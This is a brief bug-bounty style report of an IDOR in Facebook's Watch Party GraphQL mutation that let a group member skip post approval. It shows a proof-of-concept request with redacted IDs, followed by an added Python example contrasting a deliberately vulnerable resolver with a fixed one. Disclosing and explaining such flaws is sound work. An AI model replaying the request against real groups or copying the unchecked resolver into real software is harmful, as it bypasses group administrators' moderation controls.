[Facebook] Bypass Admin approval for Watch Party
A group member was able to bypass post approvals and post a Watch Party.
POC -
A request going to the following GraphQL endpoint -
=====================================================================
POST /graphql
HOST: facebook.com
av=XXX&__user=XXX&__a=1&variables={"input":{"client_mutation_id":"2","actor_id":"XXX","composer_session_id":"f22386d2e87fd5e","creator_actor_id":"XXX","custom_name":null,"group_id":"XXX","video_ids":["XXX"]}}&doc_id=1910407048979275
=====================================================================
Where the "group_id" could be changed (IDOR).
The response would be -
=====================================================================
=====================================================================
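As an added illustration (not part of the original report and not Facebook's code), the Python below models the server-side check the Watch Party mutation was missing. The group and membership tables, the `requires_post_approval` flag, the in-memory store and the function names are all assumptions. The vulnerable resolver publishes to whatever `group_id` the client sends; the fixed one takes the actor from the authenticated session, requires that actor to be a member of the named group and, where the group requires post approval, queues a non-admin's Watch Party for review instead of publishing it, which is the same rule an ordinary group post would follow.

```python
"""Hypothetical resolver for a 'create watch party' GraphQL mutation.

Constructed example: groups, memberships, IDs and field names are assumptions,
not Facebook's schema. Shows a resolver that trusts the client-supplied
group_id beside one that applies the group's post-approval rule server-side.
"""
from dataclasses import dataclass, field


class AuthorizationError(Exception):
    """Raised when the actor may not post to the requested group."""


@dataclass
class Group:
    group_id: str
    admins: set[str]
    members: set[str]
    requires_post_approval: bool
    feed: list[dict] = field(default_factory=list)     # live posts
    pending: list[dict] = field(default_factory=list)  # awaiting admin review


def sample_groups() -> dict[str, Group]:
    """Constructed sample data: one group with post approval switched on,
    one without. Returned fresh so callers do not share mutable state."""
    return {
        "group-1": Group("group-1", admins={"admin-1"},
                         members={"admin-1", "member-1"},
                         requires_post_approval=True),
        "group-2": Group("group-2", admins={"admin-2"},
                         members={"admin-2"},
                         requires_post_approval=False),
    }


def create_watch_party_vulnerable(session_actor: str, variables: dict,
                                  groups: dict[str, Group]) -> dict:
    """Mirrors the reported behaviour: whatever group_id arrives in the
    mutation input is used, and the Watch Party is published immediately,
    bypassing the group's post-approval setting."""
    inp = variables["input"]
    group = groups[inp["group_id"]]
    post = {"type": "watch_party", "actor_id": session_actor,
            "video_ids": list(inp["video_ids"])}
    group.feed.append(post)
    return {"status": "published", "group_id": group.group_id}


def create_watch_party_fixed(session_actor: str, variables: dict,
                             groups: dict[str, Group]) -> dict:
    """Same mutation with the checks the Watch Party path lacked.

    The actor comes from the authenticated session, not from the input's
    actor_id field (assumed design choice). The actor must be a member of
    the group named in the input, and when that group requires post
    approval a non-admin's Watch Party is queued for review."""
    inp = variables["input"]
    group = groups.get(inp["group_id"])
    if group is None or session_actor not in group.members:
        # Same error for "no such group" and "not a member": a non-member
        # learns nothing about whether the group exists.
        raise AuthorizationError("actor may not post to this group")

    post = {"type": "watch_party", "actor_id": session_actor,
            "video_ids": list(inp["video_ids"])}
    if group.requires_post_approval and session_actor not in group.admins:
        group.pending.append(post)
        return {"status": "pending_approval", "group_id": group.group_id}

    group.feed.append(post)
    return {"status": "published", "group_id": group.group_id}


if __name__ == "__main__":
    # Constructed request matching the shape of the reported mutation input.
    variables = {"input": {"group_id": "group-1", "video_ids": ["video-1"]}}
    print(create_watch_party_vulnerable("member-1", variables, sample_groups()))
    print(create_watch_party_fixed("member-1", variables, sample_groups()))
```

The point of the fixed version is that the approval decision is made from server-side group state keyed by the `group_id` the client supplied, never from anything else in the request; the client may choose which group it asks about, but cannot choose whether that group's approval rule applies.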